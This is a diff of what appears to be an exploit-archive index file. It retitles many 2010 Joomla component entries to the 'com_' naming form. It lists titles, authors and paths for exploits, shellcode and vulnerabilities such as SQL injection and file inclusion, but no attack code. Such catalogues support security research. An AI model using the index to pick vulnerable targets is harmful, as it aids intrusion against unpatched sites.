 15106,platforms/asp/webapps/15106.txt,"VisualSite CMS 1.3 - Multiple Vulnerabilities",2010-09-25,Abysssec,asp,webapps,0
 15116,platforms/windows/shellcode/15116.cpp,"Windows Mobile 6.5 TR (WinCE 5.2) - MessageBox Shellcode (ARM)",2010-09-26,"Celil Ünüver",windows,shellcode,0
-15157,platforms/php/webapps/15157.txt,"Joomla! Component je Guestbook 1.0 - Multiple Vulnerabilities",2010-09-30,"Salvatore Fresta",php,webapps,0
+15157,platforms/php/webapps/15157.txt,"Joomla! Component 'com_jeguestbook' 1.0 - Multiple Vulnerabilities",2010-09-30,"Salvatore Fresta",php,webapps,0
 15118,platforms/asp/webapps/15118.txt,"gokhun asp stok 1.0 - Multiple Vulnerabilities",2010-09-26,KnocKout,asp,webapps,0
 15119,platforms/php/webapps/15119.txt,"PEEL Premium 5.71 - SQL Injection",2010-09-26,KnocKout,php,webapps,0
 15110,platforms/php/webapps/15110.txt,"E-Xoopport - Samsara 3.1 (eCal Module) - Blind SQL Injection",2010-09-25,_mRkZ_,php,webapps,0
@@ -13203,8 +13203,8 @@ id,file,description,date,author,platform,type,port
 15156,platforms/windows/local/15156.py,"Quick Player 1.3 - Unicode SEH Exploit",2010-09-29,"Abhishek Lyall",windows,local,0
 15158,platforms/windows/dos/15158.py,"Microsoft Unicode Scripts Processor - Remote Code Execution",2010-09-30,Abysssec,windows,dos,0
 15160,platforms/asp/webapps/15160.txt,"ASPMass Shopping Cart - Arbitrary File Upload / Cross-Site Request Forgery",2010-09-30,Abysssec,asp,webapps,0
-15162,platforms/php/webapps/15162.rb,"Joomla! Component JE Job - SQL Injection",2010-09-30,"Easy Laster",php,webapps,0
-15163,platforms/php/webapps/15163.rb,"Joomla! Component JE Directory - SQL Injection",2010-09-30,"Easy Laster",php,webapps,0
+15162,platforms/php/webapps/15162.rb,"Joomla! Component 'com_jejob' - SQL Injection",2010-09-30,"Easy Laster",php,webapps,0
+15163,platforms/php/webapps/15163.rb,"Joomla! Component 'com_jedirectory' - SQL Injection",2010-09-30,"Easy Laster",php,webapps,0
 15164,platforms/php/webapps/15164.txt,"JomSocial 1.8.8 - Arbitrary File Upload",2010-09-30,"Jeff Channell",php,webapps,0
 15165,platforms/php/webapps/15165.txt,"zen cart 1.3.9f - Multiple Vulnerabilities",2010-10-01,LiquidWorm,php,webapps,0
 15166,platforms/php/webapps/15166.txt,"Zen Cart 1.3.9f (typefilter) - Local File Inclusion",2010-10-01,LiquidWorm,php,webapps,0
@@ -13246,9 +13246,9 @@ id,file,description,date,author,platform,type,port
 15218,platforms/asp/webapps/15218.txt,"xWeblog 2.2 - (oku.asp?makale_id) SQL Injection",2010-10-07,KnocKout,asp,webapps,0
 15219,platforms/asp/webapps/15219.py,"xWeblog 2.2 - (arsiv.asp tarih) SQL Injection",2010-10-08,ZoRLu,asp,webapps,0
 15220,platforms/php/webapps/15220.txt,"Flex Timesheet - Authentication Bypass",2010-10-08,KnocKout,php,webapps,0
-15222,platforms/php/webapps/15222.txt,"Joomla! Component Community Builder Enhenced (CBE) - Local File Inclusion / Remote Code Execution",2010-10-09,"Delf Tonder",php,webapps,0
+15222,platforms/php/webapps/15222.txt,"Joomla! Component 'com_cbe' - Local File Inclusion / Remote Code Execution",2010-10-09,"Delf Tonder",php,webapps,0
 15223,platforms/php/webapps/15223.txt,"Chipmunk Pwngame - Multiple SQL Injections",2010-10-09,KnocKout,php,webapps,0
-15224,platforms/php/webapps/15224.txt,"Joomla! Component js Calendar 1.5.1 Joomla! - Multiple Vulnerabilities",2010-10-09,"Salvatore Fresta",php,webapps,0
+15224,platforms/php/webapps/15224.txt,"Joomla! Component 'com_jscalendar' 1.5.1 - Multiple Vulnerabilities",2010-10-09,"Salvatore Fresta",php,webapps,0
 15225,platforms/php/webapps/15225.txt,"VideoDB 3.0.3 - Multiple Vulnerabilities",2010-10-09,Valentin,php,webapps,0
 15268,platforms/php/webapps/15268.txt,"WikiWebHelp 0.3.3 - Insecure Cookie Handling",2010-10-17,FuRty,php,webapps,0
 39571,platforms/php/webapps/39571.txt,"ZenPhoto 1.4.11 - Remote File Inclusion",2016-03-17,"Curesec Research Team",php,webapps,80
@@ -13304,7 +13304,7 @@ id,file,description,date,author,platform,type,port
 15267,platforms/windows/dos/15267.py,"Novel eDirectory DHost Console 8.8 SP3 - Local Overwrite (SEH)",2010-10-17,d0lc3,windows,dos,0
 15270,platforms/asp/webapps/15270.txt,"Kisisel Radyo Script - Multiple Vulnerabilities",2010-10-17,FuRty,asp,webapps,0
 15609,platforms/windows/local/15609.txt,"Microsoft Windows Vista/7 - Elevation of Privileges (UAC Bypass)",2010-11-24,noobpwnftw,windows,local,0
-15610,platforms/php/webapps/15610.txt,"Joomla! Component JE Ajax Event Calendar (com_jeajaxeventcalendar) - SQL Injection",2010-11-25,"ALTBTA ",php,webapps,0
+15610,platforms/php/webapps/15610.txt,"Joomla! Component 'com_jeajaxeventcalendar' - SQL Injection",2010-11-25,"ALTBTA ",php,webapps,0
 15273,platforms/multiple/dos/15273.txt,"Opera 10.63 - SVG Animation Element Denial of Service",2010-10-17,fla,multiple,dos,0
 15274,platforms/linux/local/15274.txt,"GNU C library dynamic linker - '$ORIGIN' Expansion",2010-10-18,"Tavis Ormandy",linux,local,0
 15279,platforms/windows/local/15279.rb,"Fat Player 0.6b - '.wav' Buffer Overflow (SEH)",2010-10-18,"James Fitts",windows,local,0
@@ -13373,7 +13373,7 @@ id,file,description,date,author,platform,type,port
 15350,platforms/php/webapps/15350.rb,"PHPKit 1.6.1 R2 - overview.php SQL Injection",2010-10-29,"Easy Laster",php,webapps,0
 15351,platforms/php/webapps/15351.rb,"mygamingladder MGL Combo System 7.5 - game.php SQL Injection",2010-10-29,"Easy Laster",php,webapps,0
 15352,platforms/windows/remote/15352.html,"Mozilla Firefox 3.6.8 < 3.6.11 - Interleaving document.write and appendChild Exploit (From the Wild)",2010-10-29,Unknown,windows,remote,0
-15353,platforms/php/webapps/15353.txt,"Joomla! Component com_jfuploader < 2.12 - Arbitrary File Upload",2010-10-30,Setr0nix,php,webapps,0
+15353,platforms/php/webapps/15353.txt,"Joomla! Component 'com_jfuploader' < 2.12 - Arbitrary File Upload",2010-10-30,Setr0nix,php,webapps,0
 15354,platforms/php/webapps/15354.txt,"Zoopeer 0.1 / 0.2 - 'FCKeditor' Arbitrary File Upload",2010-10-30,Net.Edit0r,php,webapps,0
 15355,platforms/php/webapps/15355.txt,"Simpli Easy (AFC Simple) NewsLetter 4.2 - Cross-Site Scripting / Information Leakage",2010-10-30,p0deje,php,webapps,0
 15356,platforms/windows/dos/15356.pl,"yPlay 2.4.5 - Denial of Service",2010-10-30,"MOHAMED ABDI",windows,dos,0
@@ -13381,8 +13381,8 @@ id,file,description,date,author,platform,type,port
 15358,platforms/windows/remote/15358.txt,"SmallFTPd 1.0.3 - Directory Traversal",2010-10-31,"Yakir Wizman",windows,remote,0
 15360,platforms/php/webapps/15360.pl,"MetInfo 2.0 - PHP Code Injection",2010-10-31,Beach,php,webapps,0
 15361,platforms/php/webapps/15361.pl,"MetInfo 3.0 - PHP Code Injection",2010-10-31,Beach,php,webapps,0
-15366,platforms/php/webapps/15366.txt,"Joomla! Component Flip Wall (com_flipwall) - SQL Injection",2010-10-31,FL0RiX,php,webapps,0
-15367,platforms/php/webapps/15367.txt,"Joomla! Component Sponsor Wall (com_sponsorwall) - SQL Injection",2010-10-31,FL0RiX,php,webapps,0
+15366,platforms/php/webapps/15366.txt,"Joomla! Component 'com_flipwall' - SQL Injection",2010-10-31,FL0RiX,php,webapps,0
+15367,platforms/php/webapps/15367.txt,"Joomla! Component 'com_sponsorwall' - SQL Injection",2010-10-31,FL0RiX,php,webapps,0
 15368,platforms/windows/remote/15368.php,"Buffy 1.3 - Directory Traversal",2010-10-31,"Yakir Wizman",windows,remote,0
 15369,platforms/php/webapps/15369.php,"Auto CMS 1.8 - Remote Code Execution",2010-10-31,"Giuseppe D'Inverno",php,webapps,0
 15370,platforms/php/webapps/15370.txt,"XAMPP 1.7.3 - Multiple Vulnerabilities",2010-11-01,TheLeader,php,webapps,0
@@ -13419,7 +13419,7 @@ id,file,description,date,author,platform,type,port
 15409,platforms/php/webapps/15409.txt,"Zen Cart 1.3.9h - Local File Inclusion",2010-11-03,"Salvatore Fresta",php,webapps,0
 15412,platforms/php/webapps/15412.txt,"eoCMS 0.9.04 - Multiple Vulnerabilities",2010-11-04,"High-Tech Bridge SA",php,webapps,0
 15411,platforms/windows/dos/15411.pl,"HtaEdit 3.2.3.0 - '.hta' Buffer Overflow",2010-11-04,anT!-Tr0J4n,windows,dos,0
-15413,platforms/php/webapps/15413.txt,"sweetrice CMS 0.6.7 - Multiple Vulnerabilities",2010-11-04,"High-Tech Bridge SA",php,webapps,0
+15413,platforms/php/webapps/15413.txt,"SweetRice 0.6.7 - Multiple Vulnerabilities",2010-11-04,"High-Tech Bridge SA",php,webapps,0
 15414,platforms/php/webapps/15414.txt,"JAF CMS 4.0 rc2 - Multiple Vulnerabilities",2010-11-04,"High-Tech Bridge SA",php,webapps,0
 15415,platforms/php/webapps/15415.txt,"MiniBB 2.5 - SQL Injection",2010-11-04,"High-Tech Bridge SA",php,webapps,0
 15416,platforms/php/webapps/15416.txt,"JBI CMS - SQL Injection",2010-11-04,Cru3l.b0y,php,webapps,0
@@ -13433,7 +13433,7 @@ id,file,description,date,author,platform,type,port
 15427,platforms/windows/remote/15427.txt,"WinTFTP Server Pro 3.1 - Directory Traversal",2010-11-05,"Yakir Wizman",windows,remote,0
 15428,platforms/multiple/dos/15428.rb,"Avidemux 2.5.4 - Buffer Overflow",2010-11-05,The_UnKn@wn,multiple,dos,0
 15429,platforms/windows/dos/15429.txt,"FileFuzz - Denial of Service",2010-11-05,Sweet,windows,dos,0
-15430,platforms/php/webapps/15430.txt,"Joomla! Component ccInvoices (com_ccinvoices) - SQL Injection",2010-11-05,FL0RiX,php,webapps,0
+15430,platforms/php/webapps/15430.txt,"Joomla! Component 'com_ccinvoices' - SQL Injection",2010-11-05,FL0RiX,php,webapps,0
 15431,platforms/php/dos/15431.txt,"PHP 5.3.3/5.2.14 - ZipArchive::getArchiveComment Null Pointer Dereference",2010-11-05,"Maksymilian Arciemowicz",php,dos,0
 15432,platforms/windows/dos/15432.html,"LeadTools 11.5.0.9 - (ltisi11n.ocx) DriverName() Access Violation Denial of Service",2010-11-05,"Matthew Bergin",windows,dos,0
 15433,platforms/windows/dos/15433.html,"LeadTools 11.5.0.9 - (ltlst11n.ocx) Insert() Access Violation Denial of Service",2010-11-05,"Matthew Bergin",windows,dos,0
@@ -13442,8 +13442,8 @@ id,file,description,date,author,platform,type,port
 15436,platforms/windows/dos/15436.html,"LeadTools 11.5.0.9 - (ltdlg11n.ocx) Bitmap Access Violation Denial of Service",2010-11-05,"Matthew Bergin",windows,dos,0
 15437,platforms/windows/remote/15437.txt,"Quick Tftp Server Pro 2.1 - Directory Traversal",2010-11-05,"Yakir Wizman",windows,remote,0
 15438,platforms/windows/remote/15438.txt,"AT-TFTP Server 1.8 - Directory Traversal",2010-11-06,"Yakir Wizman",windows,remote,0
-15439,platforms/php/webapps/15439.txt,"Joomla! Component com_connect - Local File Inclusion",2010-11-06,"Th3 RDX",php,webapps,0
-15440,platforms/php/webapps/15440.txt,"Joomla! Component DCNews com_dcnews - Local File Inclusion",2010-11-06,"Th3 RDX",php,webapps,0
+15439,platforms/php/webapps/15439.txt,"Joomla! Component 'com_connect' - Local File Inclusion",2010-11-06,"Th3 RDX",php,webapps,0
+15440,platforms/php/webapps/15440.txt,"Joomla! Component 'com_dcnews' - Local File Inclusion",2010-11-06,"Th3 RDX",php,webapps,0
 15441,platforms/php/webapps/15441.txt,"MassMirror Uploader - Remote File Inclusion",2010-11-06,ViciOuS,php,webapps,0
 15444,platforms/windows/dos/15444.txt,"G Data TotalCare 2011 - NtOpenKey Race Condition",2010-11-06,"Nikita Tarakanov",windows,dos,0
 15445,platforms/windows/remote/15445.txt,"Femitter FTP Server 1.04 - Directory Traversal",2010-11-06,chr1x,windows,remote,0
@@ -13453,25 +13453,25 @@ id,file,description,date,author,platform,type,port
 15450,platforms/windows/remote/15450.txt,"filecopa ftp server 6.01 - Directory Traversal",2010-11-07,"Pawel Wylecial",windows,remote,21
 15451,platforms/php/webapps/15451.pl,"DeluxeBB 1.3 - Private Info Disclosure",2010-11-07,"Vis Intelligendi",php,webapps,0
 15452,platforms/php/webapps/15452.txt,"Punbb 1.3.4 - Multiple Full Path Disclosure",2010-11-07,SYSTEM_OVERIDE,php,webapps,0
-15453,platforms/php/webapps/15453.txt,"Joomla! Component com_ckforms - Local File Inclusion",2010-11-08,"ALTBTA ",php,webapps,0
-15454,platforms/php/webapps/15454.txt,"Joomla! Component com_clan - SQL Injection",2010-11-08,"AtT4CKxT3rR0r1ST ",php,webapps,0
+15453,platforms/php/webapps/15453.txt,"Joomla! Component 'com_ckforms' - Local File Inclusion",2010-11-08,"ALTBTA ",php,webapps,0
+15454,platforms/php/webapps/15454.txt,"Joomla! Component 'com_clan' - SQL Injection",2010-11-08,"AtT4CKxT3rR0r1ST ",php,webapps,0
 15455,platforms/php/webapps/15455.txt,"xt:Commerce Shopsoftware 3 / 4 - 'FCKeditor' Arbitrary File Upload",2010-11-08,Net.Edit0r,php,webapps,0
-15456,platforms/php/webapps/15456.txt,"Joomla! Component com_clanlist - SQL Injection",2010-11-08,CoBRa_21,php,webapps,0
+15456,platforms/php/webapps/15456.txt,"Joomla! Component 'com_clanlist' - SQL Injection",2010-11-08,CoBRa_21,php,webapps,0
 15494,platforms/windows/dos/15494.pl,"VbsEdit 4.7.2.0 - '.vbs' Buffer Overflow",2010-11-12,anT!-Tr0J4n,windows,dos,0
 15495,platforms/windows/dos/15495.py,"Power Audio Editor 7.4.3.230 - '.cda' Denial of Service",2010-11-12,anT!-Tr0J4n,windows,dos,0
 15496,platforms/php/webapps/15496.txt,"Metinfo 3.0 - Multiple Vulnerabilities",2010-11-12,anT!-Tr0J4n,php,webapps,0
 15458,platforms/windows/dos/15458.txt,"PCSX2 0.9.7 Beta - Binary Denial of Service",2010-11-08,41.w4r10r,windows,dos,0
 15459,platforms/php/webapps/15459.txt,"Seo Panel 2.1.0 - Critical File Disclosure",2010-11-08,MaXe,php,webapps,0
-15460,platforms/php/webapps/15460.txt,"Joomla! Component ProDesk 1.5 - Local File Inclusion",2010-11-08,d3v1l,php,webapps,0
+15460,platforms/php/webapps/15460.txt,"Joomla! Component 'com_pro_desk' 1.5 - Local File Inclusion",2010-11-08,d3v1l,php,webapps,0
 15461,platforms/windows/local/15461.c,"G Data TotalCare 2011 - Local Kernel Exploit",2010-11-08,"Nikita Tarakanov",windows,local,0
 15463,platforms/linux/dos/15463.txt,"Novell Groupwise Internet Agent - IMAP LIST Command Remote Code Execution",2010-11-09,"Francis Provencher",linux,dos,0
 15464,platforms/linux/dos/15464.txt,"Novell Groupwise Internet Agent - IMAP LIST LSUB Command Remote Code Execution",2010-11-09,"Francis Provencher",linux,dos,0
-15466,platforms/php/webapps/15466.txt,"Joomla! Component JQuarks4s 1.0.0 - Blind SQL Injection",2010-11-09,"Salvatore Fresta",php,webapps,0
+15466,platforms/php/webapps/15466.txt,"Joomla! Component 'com_jquarks4s' 1.0.0 - Blind SQL Injection",2010-11-09,"Salvatore Fresta",php,webapps,0
 15465,platforms/php/webapps/15465.rb,"Woltlab Burning Board Userlocator 2.5 - SQL Injection",2010-11-09,"Easy Laster",php,webapps,0
 15467,platforms/multiple/dos/15467.txt,"Oracle MySQL < 5.1.49 - 'WITH ROLLUP' Denial of Service",2010-11-09,"Shane Bester",multiple,dos,0
-15468,platforms/php/webapps/15468.txt,"Joomla! Component btg_oglas - HTML / Cross-Site Scripting Injection",2010-11-09,CoBRa_21,php,webapps,0
-15469,platforms/php/webapps/15469.txt,"Joomla! Component com_markt - SQL Injection",2010-11-09,CoBRa_21,php,webapps,0
-15470,platforms/php/webapps/15470.txt,"Joomla! Component com_img - Local File Inclusion",2010-11-09,CoBRa_21,php,webapps,0
+15468,platforms/php/webapps/15468.txt,"Joomla! Component 'btg_oglas' - HTML / Cross-Site Scripting Injection",2010-11-09,CoBRa_21,php,webapps,0
+15469,platforms/php/webapps/15469.txt,"Joomla! Component 'com_markt' - SQL Injection",2010-11-09,CoBRa_21,php,webapps,0
+15470,platforms/php/webapps/15470.txt,"Joomla! Component 'com_img' - Local File Inclusion",2010-11-09,CoBRa_21,php,webapps,0
 15484,platforms/php/webapps/15484.txt,"FCKEditor Core 2.x 2.4.3 - (FileManager upload.php) Arbitrary File Upload",2010-11-10,grabz,php,webapps,0
 15472,platforms/php/webapps/15472.txt,"osCommerce 2.2 - Cross-Site Request Forgery",2010-11-09,daandeveloper33,php,webapps,0
 15473,platforms/multiple/webapps/15473.html,"IBM OmniFind - Cross-Site Request Forgery",2010-11-09,"Fatih Kilic",multiple,webapps,0
@@ -13491,8 +13491,8 @@ id,file,description,date,author,platform,type,port
 15493,platforms/windows/dos/15493.py,"Visual MP3 Splitter & Joiner 6.1 - '.wav' Buffer Overflow",2010-11-12,anT!-Tr0J4n,windows,dos,0
 15497,platforms/asp/webapps/15497.txt,"ASPilot Pilot Cart 7.3 - newsroom.asp SQL Injection",2010-11-12,Daikin,asp,webapps,0
 15500,platforms/php/webapps/15500.txt,"Woltlab Burning Board 2.3.4 - File Disclosure",2010-11-12,sfx,php,webapps,0
-15501,platforms/php/webapps/15501.txt,"Joomla! Component com_jsupport - Cross-Site Scripting",2010-11-12,Valentin,php,webapps,0
-15502,platforms/php/webapps/15502.txt,"Joomla! Component com_jsupport - SQL Injection",2010-11-12,Valentin,php,webapps,0
+15501,platforms/php/webapps/15501.txt,"Joomla! Component 'com_jsupport' - Cross-Site Scripting",2010-11-12,Valentin,php,webapps,0
+15502,platforms/php/webapps/15502.txt,"Joomla! Component 'com_jsupport' - SQL Injection",2010-11-12,Valentin,php,webapps,0
 15504,platforms/hardware/dos/15504.txt,"Camtron CMNC-200 IP Camera - ActiveX Buffer Overflow",2010-11-13,"Trustwave's SpiderLabs",hardware,dos,0
 15505,platforms/hardware/remote/15505.txt,"Camtron CMNC-200 IP Camera - Directory Traversal",2010-11-13,"Trustwave's SpiderLabs",hardware,remote,0
 15506,platforms/hardware/webapps/15506.txt,"Camtron CMNC-200 IP Camera - Authentication Bypass",2010-11-13,"Trustwave's SpiderLabs",hardware,webapps,0
@@ -13506,7 +13506,7 @@ id,file,description,date,author,platform,type,port
 15515,platforms/php/webapps/15515.txt,"Invision Power Board 3 - search_app SQL Injection",2010-11-13,"Lord Tittis3000",php,webapps,0
 15516,platforms/php/webapps/15516.txt,"EasyJobPortal - Arbitrary File Upload",2010-11-13,MeGo,php,webapps,0
 15517,platforms/php/webapps/15517.txt,"Webmatic - 'index.php' SQL Injection",2010-11-13,v3n0m,php,webapps,0
-15518,platforms/php/webapps/15518.txt,"Joomla! Component ccBoard 1.2-RC - Multiple Vulnerabilities",2010-11-13,jdc,php,webapps,0
+15518,platforms/php/webapps/15518.txt,"Joomla! Component 'com_ccboard' 1.2-RC - Multiple Vulnerabilities",2010-11-13,jdc,php,webapps,0
 15519,platforms/php/webapps/15519.txt,"OneOrZero AIms 2.6.0 Members Edition - Multiple Vulnerabilities",2010-11-13,Valentin,php,webapps,0
 15524,platforms/php/webapps/15524.txt,"Pre Ads Portal - SQL Bypass",2010-11-13,Cru3l.b0y,php,webapps,0
 15531,platforms/php/webapps/15531.txt,"BSI Advance Hotel Booking System 1.0 - SQL Injection",2010-11-14,v3n0m,php,webapps,0
@@ -13523,10 +13523,10 @@ id,file,description,date,author,platform,type,port
 15544,platforms/asp/webapps/15544.txt,"Web Wiz NewsPad Express Edition 1.03 - Database File Disclosure",2010-11-15,keracker,asp,webapps,0
 15545,platforms/php/webapps/15545.txt,"Nuked-klaN Module Boutique - Blind SQL Injection",2010-11-15,[AR51]Kevinos,php,webapps,0
 15548,platforms/android/remote/15548.html,"Android 2.0/2.1 - Use-After-Free Remote Code Execution on Webkit",2010-11-15,"Itzhak Avraham",android,remote,0
-15549,platforms/php/webapps/15549.txt,"Joomla! Component com_alfurqan15x - SQL Injection",2010-11-15,kaMtiEz,php,webapps,0
+15549,platforms/php/webapps/15549.txt,"Joomla! Component 'com_alfurqan15x' - SQL Injection",2010-11-15,kaMtiEz,php,webapps,0
 15553,platforms/asp/webapps/15553.txt,"BPConferenceReporting Web Reporting - Authentication Bypass",2010-11-16,v3n0m,asp,webapps,0
 15554,platforms/asp/webapps/15554.txt,"BPRealestate Real Estate - Authentication Bypass",2010-11-16,v3n0m,asp,webapps,0
-15555,platforms/php/webapps/15555.txt,"Joomla! Component Maian Media (com_maianmedia) - SQL Injection",2010-11-16,v3n0m,php,webapps,0
+15555,platforms/php/webapps/15555.txt,"Joomla! Component 'com_maianmedia' - SQL Injection",2010-11-16,v3n0m,php,webapps,0
 15557,platforms/php/webapps/15557.txt,"openEngine 2.0 100226 - Local File Inclusion / Cross-Site Scripting",2010-11-16,"SecPod Research",php,webapps,0
 15558,platforms/multiple/dos/15558.html,"Apple Safari 5.02 - Stack Overflow Denial of Service",2010-11-16,clshack,multiple,dos,0
 15559,platforms/php/webapps/15559.txt,"IceBB 1.0-rc10 - Multiple Vulnerabilities",2010-11-16,"High-Tech Bridge SA",php,webapps,0
@@ -13539,7 +13539,7 @@ id,file,description,date,author,platform,type,port
 15567,platforms/php/webapps/15567.txt,"WebRCSdiff 0.9 - (viewver.php) Remote File Inclusion",2010-11-18,FL0RiX,php,webapps,0
 15568,platforms/php/webapps/15568.py,"chCounter 3.1.3 - SQL Injection",2010-11-18,"Matias Fontanini",php,webapps,0
 15569,platforms/windows/local/15569.rb,"MP3-Nator - Buffer Overflow (SEH DEP Bypass)",2010-11-18,"Muhamad Fadzil Ramli",windows,local,0
-15570,platforms/php/webapps/15570.php,"Joomla! Component Template Mosets Tree 2.1.6 - Overwrite Cross-Site Request Forgery",2010-11-18,jdc,php,webapps,0
+15570,platforms/php/webapps/15570.php,"Joomla! Component 'com_mtree' 2.1.6 - Overwrite Cross-Site Request Forgery",2010-11-18,jdc,php,webapps,0
 15571,platforms/php/webapps/15571.txt,"fozzcom shopping<= 7.94+8.04 - Multiple Vulnerabilities",2010-11-18,"Dr.0rYX AND Cr3W-DZ",php,webapps,0
 15572,platforms/php/webapps/15572.txt,"viart shop 4.0.5 - Multiple Vulnerabilities",2010-11-19,Ariko-Security,php,webapps,0
 15573,platforms/php/webapps/15573.html,"PHPGallery 1.1.0 - Cross-Site Request Forgery",2010-11-19,Or4nG.M4N,php,webapps,0
@@ -13552,7 +13552,7 @@ id,file,description,date,author,platform,type,port
 15582,platforms/windows/dos/15582.pl,"Native Instruments Kontakt 4 Player - '.NKI' File Syntactic Analysis Buffer Overflow (PoC)",2010-11-20,LiquidWorm,windows,dos,0
 15583,platforms/windows/dos/15583.pl,"Native Instruments Massive 1.1.4 - KSD File Handling Use-After-Free",2010-11-20,LiquidWorm,windows,dos,0
 15584,platforms/windows/local/15584.txt,"Native Instruments Service Center 2.2.5 - Privilege Escalation",2010-11-20,LiquidWorm,windows,local,0
-15585,platforms/php/webapps/15585.txt,"Joomla! Component com_jimtawl - Local File Inclusion",2010-11-20,Mask_magicianz,php,webapps,0
+15585,platforms/php/webapps/15585.txt,"Joomla! Component 'com_jimtawl' - Local File Inclusion",2010-11-20,Mask_magicianz,php,webapps,0
 16087,platforms/php/webapps/16087.txt,"PMB Services 3.4.3 - SQL Injection",2011-02-01,Luchador,php,webapps,0
 15588,platforms/php/webapps/15588.txt,"S_CMS 2.5 - Multiple Vulnerabilities",2010-11-20,LordTittiS,php,webapps,0
 15589,platforms/windows/local/15589.wsf,"Microsoft Windows - Task Scheduler Privilege Escalation",2010-11-20,webDEViL,windows,local,0
@@ -13657,12 +13657,12 @@ id,file,description,date,author,platform,type,port
 15711,platforms/php/webapps/15711.pl,"Abtp Portal Project 0.1.0 - Local File Inclusion",2010-12-09,Br0ly,php,webapps,0
 15712,platforms/arm/shellcode/15712.rb,"ARM - Create a New User with UID 0 Shellcode (Metasploit) (Generator) (66+ bytes)",2010-12-09,"Jonathan Salwan",arm,shellcode,0
 15717,platforms/multiple/remote/15717.txt,"VMware Tools - Update OS Command Injection",2010-12-09,"Nahuel Grisolia",multiple,remote,0
-15714,platforms/php/webapps/15714.txt,"Joomla! Component JE Auto 1.0 - SQL Injection",2010-12-09,"Salvatore Fresta",php,webapps,0
+15714,platforms/php/webapps/15714.txt,"Joomla! Component 'com_jeauto' 1.0 - SQL Injection",2010-12-09,"Salvatore Fresta",php,webapps,0
 15715,platforms/php/webapps/15715.txt,"CMScout 2.09 - Cross-Site Request Forgery",2010-12-09,"High-Tech Bridge SA",php,webapps,0
 15720,platforms/php/webapps/15720.txt,"Sulata iSoft - 'stream.php' Local File Disclosure",2010-12-10,Sudden_death,php,webapps,0
 15718,platforms/php/webapps/15718.txt,"AJ Matrix DNA - SQL Injection",2010-12-09,Br0ly,php,webapps,0
 15719,platforms/php/webapps/15719.txt,"JE Messenger 1.0 - Arbitrary File Upload",2010-12-09,"Salvatore Fresta",php,webapps,0
-15721,platforms/php/webapps/15721.txt,"Joomla! Component Billy Portfolio 1.1.2 - Blind SQL Injection",2010-12-10,jdc,php,webapps,0
+15721,platforms/php/webapps/15721.txt,"Joomla! Component 'com_billyportfolio' 1.1.2 - Blind SQL Injection",2010-12-10,jdc,php,webapps,0
 15722,platforms/multiple/dos/15722.txt,"PHP 5.3.3 - NumberFormatter::getSymbol Integer Overflow",2010-12-10,"Maksymilian Arciemowicz",multiple,dos,0
 15723,platforms/freebsd/remote/15723.c,"FreeBSD Litespeed Web Server 4.0.17 with PHP - Remote Exploit",2010-12-10,kingcope,freebsd,remote,0
 15803,platforms/windows/dos/15803.py,"Microsoft IIS 7.5 (Windows 7) - FTPSVC UNAUTH'D Remote Denial of Service (PoC)",2010-12-21,"Matthew Bergin",windows,dos,0
@@ -13684,7 +13684,7 @@ id,file,description,date,author,platform,type,port
 15746,platforms/windows/remote/15746.rb,"Microsoft Internet Explorer 8 - CSS Parser Exploit",2010-12-15,"Nephi Johnson",windows,remote,0
 15747,platforms/windows/local/15747.py,"Aesop GIF Creator 2.1 - '.aep' Buffer Overflow",2010-12-16,xsploitedsec,windows,local,0
 15748,platforms/php/webapps/15748.txt,"QualDev eCommerce script - SQL Injection",2010-12-16,ErrNick,php,webapps,0
-15749,platforms/php/webapps/15749.txt,"Joomla! Component JRadio (com_jradio) - Local File Inclusion",2010-12-16,Sid3^effects,php,webapps,0
+15749,platforms/php/webapps/15749.txt,"Joomla! Component 'com_jradio' - Local File Inclusion",2010-12-16,Sid3^effects,php,webapps,0
 15750,platforms/windows/dos/15750.py,"Solar FTP Server 2.0 - Multiple Commands Denial of Service",2010-12-16,modpr0be,windows,dos,0
 15751,platforms/windows/local/15751.pl,"Altarsoft Audio Converter 1.1 - Buffer Overflow (SEH)",2010-12-16,"C4SS!0 G0M3S",windows,local,0
 15752,platforms/php/webapps/15752.txt,"Softbiz PHP Joke Site Software - Multiple SQL Injections",2010-12-17,v3n0m,php,webapps,0
@@ -13710,7 +13710,7 @@ id,file,description,date,author,platform,type,port
 15775,platforms/php/webapps/15775.txt,"Mafia Game Script - SQL Injection",2010-12-18,"DeadLy DeMon",php,webapps,0
 15776,platforms/asp/webapps/15776.pl,"Virtual Store Open 3.0 - Acess SQL Injection",2010-12-18,Br0ly,asp,webapps,0
 15777,platforms/asp/webapps/15777.txt,"Oto Galery 1.0 - Multiple SQL Injections",2010-12-19,"DeadLy DeMon",asp,webapps,0
-15779,platforms/php/webapps/15779.txt,"Joomla! Component JE Auto (com_jeauto) - Local File Inclusion",2010-12-19,Sid3^effects,php,webapps,0
+15779,platforms/php/webapps/15779.txt,"Joomla! Component 'com_jeauto' - Local File Inclusion",2010-12-19,Sid3^effects,php,webapps,0
 15781,platforms/php/webapps/15781.txt,"Inout Webmail Script - Persistent Cross-Site Scripting",2010-12-20,Sid3^effects,php,webapps,0
 15782,platforms/windows/local/15782.pl,"Word Splash Pro 9.5 - Buffer Overflow",2010-12-20,h1ch4m,windows,local,0
 15783,platforms/php/webapps/15783.txt,"MaticMarket 2.02 for PHP-Nuke - Local File Inclusion",2010-12-20,xer0x,php,webapps,0
@@ -13721,7 +13721,7 @@ id,file,description,date,author,platform,type,port
 15788,platforms/windows/dos/15788.py,"Accmeware MP3 Cut 5.0.9 - Denial of Service (PoC)",2010-12-20,0v3r,windows,dos,0
 15789,platforms/php/webapps/15789.txt,"plx Ad Trader 3.2 - Authentication Bypass",2010-12-20,R4dc0re,php,webapps,0
 15790,platforms/php/webapps/15790.txt,"PHP Web Scripts Ad Manager Pro 3.0 - SQL Injection",2010-12-20,R4dc0re,php,webapps,0
-15791,platforms/php/webapps/15791.txt,"Joomla! Component Jotloader 2.2.1 - Local File Inclusion",2010-12-20,v3n0m,php,webapps,0
+15791,platforms/php/webapps/15791.txt,"Joomla! Component 'com_jotloader' 2.2.1 - Local File Inclusion",2010-12-20,v3n0m,php,webapps,0
 15792,platforms/hardware/dos/15792.php,"Apple iOS Safari - (body alink) Remote Crash",2010-12-20,"Yakir Wizman",hardware,dos,0
 15793,platforms/php/webapps/15793.txt,"Vacation Rental Script 4.0 - Arbitrary File Upload",2010-12-20,Br0ly,php,webapps,0
 15794,platforms/hardware/dos/15794.php,"Apple iOS Safari - (decodeURI) Remote Crash",2010-12-20,"Yakir Wizman",hardware,dos,0
@@ -13731,7 +13731,7 @@ id,file,description,date,author,platform,type,port
